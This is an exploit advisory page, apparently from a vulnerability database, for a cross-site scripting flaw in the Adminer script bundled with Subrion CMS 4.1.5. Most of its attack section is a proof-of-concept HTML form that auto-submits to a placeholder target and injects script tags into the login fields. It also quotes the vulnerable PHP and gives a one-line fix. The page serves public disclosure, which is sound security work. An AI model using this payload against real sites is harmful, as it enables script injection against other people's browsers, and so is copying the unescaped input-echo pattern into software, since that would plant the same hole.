Subrion Cms Cross Site Scripting (XSS)

2017.09.07
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

___________________________________________________ | | Exploit Title: Subrion Cms Cross Site Scripting (XSS) | Exploit Author: Ashiyane Digital security Team | Vendor Homepage : https://subrion.org/ | Software Link: https://tools.subrion.org/get/latest.zip | Version: 4.1.5 | Date: 2017 - 07 - 9 | Tested on: Kali-Linux /FireFox |__________________________________________________ Exploit : <html> <body onload="document.exploit.submit()"> <form action='http://TARGET/PATH/includes/adminer/adminer.script.php' method='post'> <table cellspacing="0"> <tr><th>System<td><select name='auth[driver]' onchange="loginDriver(this);"> <option value="server" selected>MySQL</select><tr><th>Server<td> <input name="auth[server]" value="" title="hostname[:port]" placeholder="localhost" autocapitalize="off"> <tr><th>Username<td><input name="auth[username]" id="username" value=""/><script>alert('M.R.S.L.Y/ XSS 1')</script>" autocapitalize="off"> <tr><th>Password<td><input type="password" name="auth[password]"> <tr><th>Database<td><input name="auth[db]" value=""/><script>alert('M.R.S.L.Y/ XSS 2')</script>" autocapitalize="off"> </table> <script type="text/javascript"> var username = document.getElementById('username'); focus(username); username.form['auth[driver]'].onchange(); </script> <p><input type='submit' value='Login'> <label><input type='checkbox' name='auth[permanent]' value='1'>Permanent login</label> <div></div> </form> </html> __________________________________________________ Vulnerable method : $_POST Vulnerable File : /includes/adminer/adminer.script.php Vulnerable code: line 367 : 372 loginForm(){global$Eb;echo'<table cellspacing="0"> <tr><th>System<td>',html_select("auth[driver]",$Eb,DRIVER,"loginDriver(this);"),'<tr><th>Server<td><input name="auth[server]" value="',h(SERVER),'" title="hostname[:port]" placeholder="localhost" autocapitalize="off"> <tr><th>Username<td><input name="auth[username]" id="username" value="',h($_GET["username"]),'" autocapitalize="off"> <tr><th>Password<td><input type="password" name="auth[password]"> <tr><th>Database<td><input name="auth[db]" value="',h($_GET["db"]);?>" autocapitalize="off"> </table> __________________________________________________ #patch: For fix this vulnerability you use htmlspecialchars() function . __________________________________________________ Discovered By : M.R.S.L.Y __________________________________________________


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top